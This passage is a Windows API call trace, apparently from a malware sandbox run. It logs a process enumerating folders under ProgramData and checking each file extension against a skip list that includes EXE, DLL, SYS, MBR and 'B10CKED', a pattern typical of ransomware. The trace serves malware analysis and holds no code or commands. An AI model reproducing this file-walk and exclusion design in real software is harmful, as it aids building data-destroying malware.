CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.518] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.518] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0108.605] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.605] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.605] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.605] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.605] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.606] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0108.606] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0108.606] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.606] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.606] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.606] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.607] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.607] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.607] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.607] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.607] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.607] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.608] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.608] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.608] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.608] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.608] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.608] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.608] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.608] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.608] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.608] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW 